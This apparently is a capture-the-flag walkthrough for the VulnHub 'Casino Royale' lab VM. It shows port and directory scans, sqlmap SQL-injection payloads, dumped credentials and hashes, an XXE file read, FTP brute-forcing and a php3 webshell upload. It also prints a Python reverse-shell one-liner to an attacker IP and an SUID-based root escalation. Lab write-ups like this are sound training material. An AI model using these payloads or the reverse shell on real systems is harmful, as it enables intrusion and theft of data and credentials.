you can download it here: https://www.vulnhub.com/entry/casino-royale-1,287/

use nmap to do port scanning.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
nmap -p 1-65535 -T4 -A -v 192.168.227.158

Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-08 07:38 EDT
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 07:38
Completed NSE at 07:38, 0.00s elapsed
Initiating NSE at 07:38
Completed NSE at 07:38, 0.00s elapsed
Initiating ARP Ping Scan at 07:38
Scanning 192.168.227.158 [1 port]
Completed ARP Ping Scan at 07:38, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 07:38
Completed Parallel DNS resolution of 1 host. at 07:38, 0.15s elapsed
Initiating SYN Stealth Scan at 07:38
Scanning 192.168.227.158 [65535 ports]
Discovered open port 21/tcp on 192.168.227.158
Discovered open port 25/tcp on 192.168.227.158
Discovered open port 80/tcp on 192.168.227.158
Discovered open port 8081/tcp on 192.168.227.158
Completed SYN Stealth Scan at 07:38, 2.27s elapsed (65535 total ports)
Initiating Service scan at 07:38
Scanning 4 services on 192.168.227.158
Completed Service scan at 07:39, 26.04s elapsed (4 services on 1 host)
Initiating OS detection (try #1) against 192.168.227.158
NSE: Script scanning 192.168.227.158.
Initiating NSE at 07:39
Completed NSE at 07:39, 4.36s elapsed
Initiating NSE at 07:39
Completed NSE at 07:39, 0.00s elapsed
Nmap scan report for 192.168.227.158
Host is up (0.0016s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
25/tcp open smtp Postfix smtpd
|_smtp-commands: casino.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8,
| ssl-cert: Subject: commonName=casino
| Subject Alternative Name: DNS:casino
| Issuer: commonName=casino
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-11-17T20:14:11
| Not valid after: 2028-11-14T20:14:11
| MD5: b488 59b7 e962 5fc2 c5b4 1616 60ff f9a1
|_SHA-1: 82d3 8821 8c9f e198 8227 8bf3 57a1 cb08 53a1 6288
|_ssl-date: TLS randomness does not represent time
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-methods:
|_ Supported Methods: OPTIONS HEAD GET POST
| http-robots.txt: 2 disallowed entries
|_/cards /kboard
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
8081/tcp open http PHP cli server 5.5 or later
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 00:0C:29:EA:4C:78 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 0.088 days (since Sat Jun 8 05:32:58 2019)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE
HOP RTT ADDRESS
1 1.65 ms 192.168.227.158

NSE: Script Post-scanning.
Initiating NSE at 07:39
Completed NSE at 07:39, 0.00s elapsed
Initiating NSE at 07:39
Completed NSE at 07:39, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.93 seconds
Raw packets sent: 65558 (2.885MB) | Rcvd: 65550 (2.623MB)

http port: 80 and 8081, check its 80 port first.

1

nothing special, using dirb to check for sensitive files and directories.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
root@kali:~# dirb http://192.168.227.158/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sat Jun 8 07:43:52 2019
URL_BASE: http://192.168.227.158/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.227.158/ ----
==> DIRECTORY: http://192.168.227.158/cards/
+ http://192.168.227.158/cgi-bin/ (CODE:403|SIZE:298)
==> DIRECTORY: http://192.168.227.158/includes/
+ http://192.168.227.158/index.html (CODE:200|SIZE:220)
+ http://192.168.227.158/index.php (CODE:200|SIZE:2797)
==> DIRECTORY: http://192.168.227.158/install/
==> DIRECTORY: http://192.168.227.158/javascript/
==> DIRECTORY: http://192.168.227.158/kboard/
==> DIRECTORY: http://192.168.227.158/phpmyadmin/
+ http://192.168.227.158/robots.txt (CODE:200|SIZE:49)
+ http://192.168.227.158/server-status (CODE:403|SIZE:303)

---- Entering directory: http://192.168.227.158/cards/ ----
+ http://192.168.227.158/cards/index.php (CODE:200|SIZE:51)

---- Entering directory: http://192.168.227.158/includes/ ----
+ http://192.168.227.158/includes/index.html (CODE:200|SIZE:301)

---- Entering directory: http://192.168.227.158/install/ ----
+ http://192.168.227.158/install/index.php (CODE:200|SIZE:2812)

---- Entering directory: http://192.168.227.158/javascript/ ----
==> DIRECTORY: http://192.168.227.158/javascript/jquery/

---- Entering directory: http://192.168.227.158/kboard/ ----
+ http://192.168.227.158/kboard/index.php (CODE:200|SIZE:46)

---- Entering directory: http://192.168.227.158/phpmyadmin/ ----
==> DIRECTORY: http://192.168.227.158/phpmyadmin/doc/
+ http://192.168.227.158/phpmyadmin/favicon.ico (CODE:200|SIZE:22486)
+ http://192.168.227.158/phpmyadmin/index.php (CODE:200|SIZE:10525)
==> DIRECTORY: http://192.168.227.158/phpmyadmin/js/
==> DIRECTORY: http://192.168.227.158/phpmyadmin/libraries/
==> DIRECTORY: http://192.168.227.158/phpmyadmin/locale/
+ http://192.168.227.158/phpmyadmin/phpinfo.php (CODE:200|SIZE:10527)
==> DIRECTORY: http://192.168.227.158/phpmyadmin/setup/
==> DIRECTORY: http://192.168.227.158/phpmyadmin/sql/
==> DIRECTORY: http://192.168.227.158/phpmyadmin/templates/
==> DIRECTORY: http://192.168.227.158/phpmyadmin/themes/

---- Entering directory: http://192.168.227.158/javascript/jquery/ ----
+ http://192.168.227.158/javascript/jquery/jquery (CODE:200|SIZE:267180)

---- Entering directory: http://192.168.227.158/phpmyadmin/doc/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.227.158/phpmyadmin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.227.158/phpmyadmin/libraries/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.227.158/phpmyadmin/locale/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.227.158/phpmyadmin/setup/ ----
==> DIRECTORY: http://192.168.227.158/phpmyadmin/setup/frames/
+ http://192.168.227.158/phpmyadmin/setup/index.php (CODE:200|SIZE:927)
==> DIRECTORY: http://192.168.227.158/phpmyadmin/setup/lib/

---- Entering directory: http://192.168.227.158/phpmyadmin/sql/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.227.158/phpmyadmin/templates/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.227.158/phpmyadmin/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.227.158/phpmyadmin/setup/frames/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.227.158/phpmyadmin/setup/lib/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Sat Jun 8 07:44:20 2019
DOWNLOADED: 41508 - FOUND: 14

2

3

walked around and quickly found a sql injection here:

4

5

save the http request data as header.txt and run it with sqlmap.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
root@kali:~# cat header.txt 
POST /index.php HTTP/1.1
Host: 192.168.227.158
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.227.158/index.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 66
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

op=showtournament&tournamentid=171118175238


root@kali:~# sqlmap -r header.txt --dbs
___
__H__
___ ___[,]_____ ___ ___ {1.3.6#stable}
|_ -| . [.] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 07:49:09 /2019-06-08/

[07:49:09] [INFO] parsing HTTP request from 'header.txt'
[07:49:10] [INFO] resuming back-end DBMS 'mysql'
[07:49:10] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: tournamentid (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: op=showtournament&tournamentid=171118175238' AND 3259=3259 AND 'fsVI'='fsVI

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: op=showtournament&tournamentid=171118175238' AND (SELECT 6509 FROM (SELECT(SLEEP(5)))xoVg) AND 'bWgC'='bWgC
---
[07:49:10] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 9.0 (stretch)
web application technology: Apache 2.4.25
back-end DBMS: MySQL >= 5.0.12
[07:49:10] [INFO] fetching database names
[07:49:10] [INFO] fetching number of databases
[07:49:10] [INFO] resumed: 6
[07:49:10] [INFO] resumed: information_schema
[07:49:10] [INFO] resumed: mysql
[07:49:10] [INFO] resumed: performance_schema
[07:49:10] [INFO] resumed: phpmyadmin
[07:49:10] [INFO] resumed: pokerleague
[07:49:10] [INFO] resumed: vip
available databases [6]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] pokerleague
[*] vip

[07:49:10] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.227.158'

[*] ending @ 07:49:10 /2019-06-08/

walked around the mysql databases and found some useful information:

mysql current user: valenka@localhost

mysql user: phpmyadmin, hash: *D4020D9182CC52B86DC49251A1B6DA9AD7023B98(decrypted to be controls$$$)

database: pokerleague:

​ table: pokermax_admin

​ username: admin, password: raise12million, host: casino-royale.local

database: vip:

​ table: sfc_user_accounts (salt is also in md5 format length, no hope to decrypt from online resources)

​ username: admin, password hash: ac34e36d92ba9a37c9dad1be75967732

​ username: le, password hash: 6090fe0fe52d6257f38428094e31fd38

​ username: test, password hash: 83735f33a315cebcf22bc93dccdd7bff

​ one interesting link: /ultra-access-view/main.php

6

1
2
3
4
5
6
7
8
9
10
libxml_disable_entity_loader (false); 

$xmlfile = file_get_contents('php://input');

$dom = new DOMDocument();
$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
$creds = simplexml_import_dom($dom);
$user = $creds->customer;
$pass = $creds->password;
echo "Welcome $user !";

ok, this is an obvious xxe which allows me to read arbitrary files on server(if privilege is enough)

7

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
rtkit:x:105:109:RealtimeKit,,,:/proc:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
speech-dispatcher:x:108:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
lightdm:x:109:113:Light Display Manager:/var/lib/lightdm:/bin/false
pulse:x:110:114:PulseAudio daemon,,,:/var/run/pulse:/bin/false
avahi:x:111:117:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
saned:x:112:118::/var/lib/saned:/bin/false
le:x:1000:1000:Le Chiffre,,,:/home/le:/bin/bash
mysql:x:113:120:MySQL Server,,,:/nonexistent:/bin/false
valenka:x:1001:1001:,,,:/home/valenka:/bin/bash
postfix:x:114:121::/var/spool/postfix:/bin/false
ftp:x:115:124:ftp daemon,,,:/srv/ftp:/bin/false
ftpUserULTRA:x:1002:1002::/var/www/html/ultra-access-view:/bin/bash

four users with /bin/bash:

root, le, valenka, ftpUserULTRA

and from the hint from above, “also pls update the password for the custom ftp acct once the front end is finished..since it’s easy “, I guess I need to bruteforce the ftp password with username ftpUserULTRA

tried bruteforcing with top 100000 passwords and finally get the correct one: bankbank

8

but port 22 is not open, I cannot connect to its sshd server. I guess I have to connect to its ftp then upload webshell to gain a shell.

tried hard and harder, the ftp does not allow me to upload file with php extension, but allows me to upload file with php3 extension. so I uploaded a php webshell end with php3 to gain a reverse shell.

9

10

looking for suid file:

1
find / -user root -perm -4000 -print 2>/dev/null

and found one interesting file:

11

/opt/casino-royale/mi6_detect_test

12

seems like that mi6_detect_test is extracting output from ps and netstat, interestingly, if I execute mi6_detect_test outside the /opt/casino-royale/ folder, it will prompt “/bin/bash: run.sh: No such file or directory”

17

I guess mi6_detect_test is calling run.sh in the same folder when being executed. So if I can modify run.sh, then I would get a root shell. but run.sh is only editable by le.

take a closer look:

13

this is essentially the working directory for http server of 8081 port:

14

15

so the logic is:

le is running the http server at port 8081, as we can see from the output of mi6_detect_test

16

so when we click “Run Data Collect”, it(le) will execute collect.php, which will invoke casino-data-collection.py, and then will print out the output of casino-data-collection.py

notice that casino-data-collection.py is owned by le, but its group is www-data, which means I can modify it with webshell!

okay, the path is quite clear: I modify casino-data-collection.py to get a shell from le, then edit run.sh to provoke /bin/bash, and then run mi6_detect_test, since mi6_detect_test’s suid is set, it will call run.sh as root, then run.sh will provoke /bin/bash as root, which will give me a root shell.

I modified the casino-data-collection.py as below:

1
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.227.129",12345));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

and click “Run Data Collect” in the browser, successfully get a reverse shell from le.

18

then I append one more line at the back of run.sh.

1
echo "/bin/bash" >> run.sh

then I executed mi6_detect_test, and gain a root shell.

19

20

PS: This is a very good challenge.